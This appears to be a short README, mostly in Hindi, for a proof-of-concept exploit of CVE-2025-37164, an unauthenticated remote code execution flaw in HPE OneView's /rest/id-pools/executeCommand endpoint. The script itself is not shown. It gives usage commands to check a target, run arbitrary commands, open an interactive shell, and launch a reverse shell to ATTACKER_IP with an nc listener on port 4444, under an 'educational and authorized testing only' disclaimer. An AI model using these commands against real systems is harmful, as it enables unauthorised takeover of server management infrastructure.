
CVE-2025-37164 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, HPE OneView में /rest/id-pools/executeCommand एंडपॉइंट के माध्यम से एक महत्वपूर्ण अनधिकृत दूरस्थ कोड निष्पादन भेद्यता।
CVE-2025-37164 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, HPE OneView में एक गंभीर (CVSS 10.0) बिना प्रमाणीकरण के रिमोट कोड निष्पादन कमजोरी।
यह सॉफ्टवेयर केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
तकनीकी विश्लेषण: कमजोरी PUT /rest/id-pools/executeCommand एंडपॉइंट में मौजूद है जिसे प्रमाणीकरण की आवश्यकता नहीं है और यह उपयोगकर्ता-नियंत्रित इनपुट को सीधे Runtime.exec() को पास करता है।
requests लाइब्रेरी (pip install requests)# Test if target is vulnerable
python3 cve-2025-37164.py -t http://target-ip --check
# Execute a single command
python3 cve-2025-37164.py -t http://target-ip -c "id"
# Interactive command shell
python3 cve-2025-37164.py -t http://target-ip -i
# Attempt reverse shell (requires listener)
# On attacker machine: nc -lvnp 4444
python3 cve-2025-37164.py -t http://target-ip --lhost ATTACKER_IP --lport 4444